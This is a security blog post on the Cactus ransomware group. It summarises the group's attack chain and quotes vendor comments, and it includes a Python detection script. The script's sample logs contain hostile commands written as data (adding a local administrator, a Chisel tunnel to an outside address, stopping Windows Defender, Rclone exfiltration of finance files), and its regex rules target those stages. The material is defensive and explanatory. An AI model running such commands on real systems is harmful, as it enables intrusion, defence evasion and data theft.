Here’s Another New Ransomware Group… This One Is Called Cactus

Kroll researchers detail the discovery of a new, unique ransomware operation known as Cactus that has been targeting high-profile commercial entities by exploiting Fortinet VPN vulnerabilities.

In analysis shared with Bleeping Computer, Kroll researchers described how the attackers used a batch script to obtain the encryptor binary using 7-Zip. Once the original ZIP is removed, the binary is deployed with a specific flag that allows it to execute, thereby evading detection.

The encryption routine in Cactus ransomware attacks is unique. After the initial VPN vulnerability exploitation, the operation proceeds through the following steps:

  • Establishes C2 with SSH
  • Scans the network and generates a target list for encryption
  • Installs remote access software for persistent access
  • Pushes files to remote machines with RMM software
  • Extracts credentials from browsers and LSASS
  • Installs Cobalt Strike and Chisel for C2
  • Disables and uninstalls antivirus software
  • Adds administrator accounts
  • Conducts exfiltration via Rclone
  • Uses TotalExec.ps1 to push and execute the ransomware
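Most of the steps in that chain leave process-creation telemetry behind, which is where a defender can catch the intrusion before the encryptor runs. The following is an added example (my own code, not Kroll's, Bleeping Computer's or the ransomware's) that runs a handful of narrow heuristics over constructed, Sysmon-style process-creation records and escalates a host only when several distinct stages of the chain show up on it. The host names, accounts, paths, the 203.0.113.10 address and the rule patterns are all invented for the example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (Sysmon Event ID 1 style,
# simplified to "timestamp|host|user|parent_image|image|command_line").
# Every host, account, path and address here is invented for this example;
# none of it comes from the Kroll or Bleeping Computer reporting.
SAMPLE_LOGS = r"""
2023-05-05T08:01:12|WS-17|corp\jdoe|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\winword.exe|winword.exe /n report.docx
2023-05-05T08:03:40|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\net.exe|net user helpdesk2 P@ssw0rd! /add
2023-05-05T08:03:41|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\net.exe|net localgroup administrators helpdesk2 /add
2023-05-05T08:10:02|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Users\Public\chisel.exe|chisel.exe client 203.0.113.10:8080
2023-05-05T08:12:55|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc stop WinDefend
2023-05-05T08:20:19|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Users\Public\rclone.exe|rclone.exe copy D:\Finance remote:share --transfers 8
2023-05-05T08:25:00|WS-17|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\TotalExec.ps1
2023-05-05T09:00:00|WS-22|corp\asmith|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem C:\Projects
2023-05-05T09:05:30|SRV-FS1|corp\admin|C:\Windows\System32\cmd.exe|C:\Program Files\rclone\rclone.exe|rclone.exe sync E:\Backups remote:offsite
"""

# (rule name, regex over the command line). Names map loosely to stages of
# the chain summarized above; the patterns are deliberately narrow heuristics
# written for this example, not vendor signatures.
RULES = [
    ("admin_account_added", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("tunnel_tool", re.compile(r"(^|\\|\s)chisel(\.exe)?\s+client\b|(^|\\|\s)ssh(\.exe)?\s.*\s-[RD]\s", re.I)),
    ("security_service_stopped", re.compile(r"\b(sc|net)(\.exe)?\s+stop\s+\S*(defend|sense|av|edr|protect)\S*", re.I)),
    ("rclone_transfer", re.compile(r"(^|\\|\s)rclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("totalexec_script", re.compile(r"totalexec\.ps1", re.I)),
    ("lsass_access", re.compile(r"\blsass(\.exe)?\b", re.I)),
]

# A single hit (e.g. the legitimate rclone backup job on SRV-FS1) is noise;
# escalate only when this many distinct stages land on one host.
MIN_STAGES = 3


def parse_line(line):
    """Split one pipe-delimited record into a dict, or None if malformed."""
    fields = line.split("|", 5)
    if len(fields) != 6:
        return None
    keys = ("timestamp", "host", "user", "parent_image", "image", "command_line")
    return dict(zip(keys, fields))


def match_rules(record):
    """Return the names of every rule whose pattern hits this record."""
    hits = []
    cmd = record["command_line"]
    image = record["image"].rsplit("\\", 1)[-1].lower()
    for name, pattern in RULES:
        # lsass.exe starting itself is normal; only other images referencing it matter.
        if name == "lsass_access" and image == "lsass.exe":
            continue
        if pattern.search(cmd):
            hits.append(name)
    return hits


def detect(log_text):
    """Return (findings, escalated): findings is a list of (host, rule, timestamp);
    escalated is the sorted list of hosts with at least MIN_STAGES distinct stages."""
    findings = []
    stages_by_host = defaultdict(set)
    for raw in log_text.strip().splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for name in match_rules(rec):
            findings.append((rec["host"], name, rec["timestamp"]))
            stages_by_host[rec["host"]].add(name)
    escalated = sorted(h for h, s in stages_by_host.items() if len(s) >= MIN_STAGES)
    return findings, escalated


if __name__ == "__main__":
    found, hosts = detect(SAMPLE_LOGS)
    for host, rule, ts in found:
        print(f"{ts} {host}: {rule}")
    print("escalate:", hosts)
```

The point of the per-host stage count is the same one the rest of the post makes: any one of these tools can be legitimate (rclone is a normal backup utility on the file server here), so the signal is the sequence of account creation, tunnelling, security-service tampering and mass file transfer appearing together on a single endpoint within a short window.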

Currently, there appears to be no leak site and information has not been made public about the ransoms the Cactus group has demanded.

I have three comments on this. The first is from Steve Hahn, Executive VP, BullWall:

   “This is yet another way for Ransomware to completely evade the endpoint security tools such as antivirus and EDR and highlights just how easy it is for the threat actors to kick off a Ransomware attack despite the most sophisticated detection tools on the planet. Every year Ransomware completely takes down thousands of enterprises. In each such event the impacted companies invested heavily in prevention tools and were given guarantees such as “completely effective against Ransomware”.

   Every Ransomware event found a way to disable or evade those tools. Even the White House admits that worsening Ransomware attacks are outpacing our ability to stop them. It’s simply a matter of time before any business is hit, loses their infrastructure for weeks and critical data permanently. We can’t continue to rely on prevention, which requires you being 100% effective 100% of the time. We must also implement Ransomware Containment tools to quickly neutralize the attack and air-gapped backup strategies to get systems restarted with the least amount of disruption. Like severe weather, you can prepare for it, but you can’t stop it.”

The next comment is from Dave Ratner, CEO, HYAS:

   “Visibility into anomalous outbound connections, indicative of communication to command-and-control, continues to grow in priority as a necessity for modern cyber protection. As attackers find new and innovative ways to infiltrate organizations, the ability to identify the command-and-control communication and stop it before data exfiltration and encryption may be the difference between business resiliency and a significant interruption of business operations.”

The final comment is from Roy Akerman, Co-Founder & CEO, Rezonate:

   “Ransomware groups continue to find stealthy techniques to bypass defenses and be able to remotely control systems. SSH backdoors, as in the case of Cactus, and other remote access techniques such as webshells provide the same control and are able to disguise as benign, lightweight traffic. SSH traffic, internal recon, use of LSASS and Cobalt Strike, tampering with security controls configuration are many steps security operations teams can better secure today. Smart security teams must take action to prevent suspicious activity on the endpoint, improve data hygiene and recovery capabilities, and limit spread of attack with least privilege access across their identity controls.”

It’s not even 9AM and already I am writing about a pair of new ransomware operations. That’s not good because it illustrates how profitable ransomware is for gangs like these. The fact that this particular ransomware has a novel way to evade detection is concerning, as it also illustrates the need for defenders to come up with ways to stay, at worst, in lockstep with these ransomware gangs.
